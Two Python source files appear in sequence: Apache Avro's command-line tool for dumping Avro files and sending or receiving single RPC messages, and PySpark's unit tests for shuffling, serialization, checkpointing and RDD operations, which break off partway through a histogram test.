tool.py
#!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import argparse
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
from pathlib import Path
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
server_should_shutdown = False
responder: "GenericResponder"
class GenericResponder(avro.ipc.Responder):
def __init__(self, proto, msg, datum) -> None:
avro.ipc.Responder.__init__(self, avro.protocol.parse(Path(proto).read_text()))
self.msg = msg
self.datum = datum
def invoke(self, message, request) -> object:
global server_should_shutdown
if message.name != self.msg:
return None
print(f"Message: {message.name} Datum: {self.datum}", file=sys.stderr)
# server will shut down after processing a single Avro request
server_should_shutdown = True
return self.datum
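# GenericHandler implements the HTTP side of the exchange: it reads one framed
# Avro request from the POST body, hands it to the module-level responder, and
# writes the framed reply back with Content-Type "avro/binary". Once the
# responder has seen the message it was waiting for, the handler shuts the
# server down on a background thread.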
class GenericHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self) -> None:
self.responder = responder
call_request_reader = avro.ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header("Content-Type", "avro/binary")
self.end_headers()
resp_writer = avro.ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri: str, proto: str, msg: str, datum: object) -> None:
global responder
global server_should_shutdown
url_obj = urllib.parse.urlparse(uri)
if url_obj.hostname is None:
raise RuntimeError(f"uri {uri} must have a hostname.")
if url_obj.port is None:
raise RuntimeError(f"uri {uri} must have a port.")
server_addr = (url_obj.hostname, url_obj.port)
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = http.server.HTTPServer(server_addr, GenericHandler)
print(f"Port: {server.server_port}")
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum) -> None:
url_obj = urllib.parse.urlparse(uri)
client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
requestor = avro.ipc.Requestor(avro.protocol.parse(Path(proto).read_text()), client)
print(requestor.request(msg, datum))
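# A minimal programmatic sketch of the client side (all names are placeholders):
#
#   send_message("http://localhost:9090", "weather.avpr", "send", {"temp": 0})
#
# This assumes the protocol file declares a message named "send" whose request
# schema accepts the datum, and that run_server (or another Avro HTTP
# responder) is already listening on the given host and port.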
def _parse_args() -> argparse.Namespace:
"""Parse the command-line arguments"""
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(required=True, dest="command") if sys.version_info >= (3, 7) else parser.add_subparsers(dest="command")
subparser_dump = subparsers.add_parser("dump", help="Dump an avro file")
subparser_dump.add_argument("input_file", type=argparse.FileType("rb"))
subparser_rpcreceive = subparsers.add_parser("rpcreceive", help="receive a message")
subparser_rpcreceive.add_argument("uri")
subparser_rpcreceive.add_argument("proto")
subparser_rpcreceive.add_argument("msg")
subparser_rpcreceive.add_argument("-file", type=argparse.FileType("rb"), required=False)
subparser_rpcsend = subparsers.add_parser("rpcsend", help="send a message")
subparser_rpcsend.add_argument("uri")
subparser_rpcsend.add_argument("proto")
subparser_rpcsend.add_argument("msg")
subparser_rpcsend.add_argument("-file", type=argparse.FileType("rb"))
return parser.parse_args()
def main_dump(args: argparse.Namespace) -> int:
print("\n".join(f"{d!r}" for d in avro.datafile.DataFileReader(args.input_file, avro.io.DatumReader())))
return 0
def main_rpcreceive(args: argparse.Namespace) -> int:
datum = None
if args.file:
with avro.datafile.DataFileReader(args.file, avro.io.DatumReader()) as dfr:
datum = next(dfr)
run_server(args.uri, args.proto, args.msg, datum)
return 0
def main_rpcsend(args: argparse.Namespace) -> int:
datum = None
if args.file:
with avro.datafile.DataFileReader(args.file, avro.io.DatumReader()) as dfr:
datum = next(dfr)
send_message(args.uri, args.proto, args.msg, datum)
return 0
def main() -> int:
args = _parse_args()
if args.command == "dump":
return main_dump(args)
if args.command == "rpcreceive":
return main_rpcreceive(args)
if args.command == "rpcsend":
return main_rpcsend(args)
return 1
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn(
"Invoking avro/tool.py directly is likely to lead to a name collision "
"with the python io module. Try doing `python -m avro.tool` instead."
)
sys.exit(main())
tests.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier\n')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except ImportError:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except ImportError:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
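# Aggregator(createCombiner, mergeValue, mergeCombiners): start a combiner as a
# one-element list, append subsequent values in place, and concatenate
# combiners when partitions are merged.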
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserialize()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regression test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
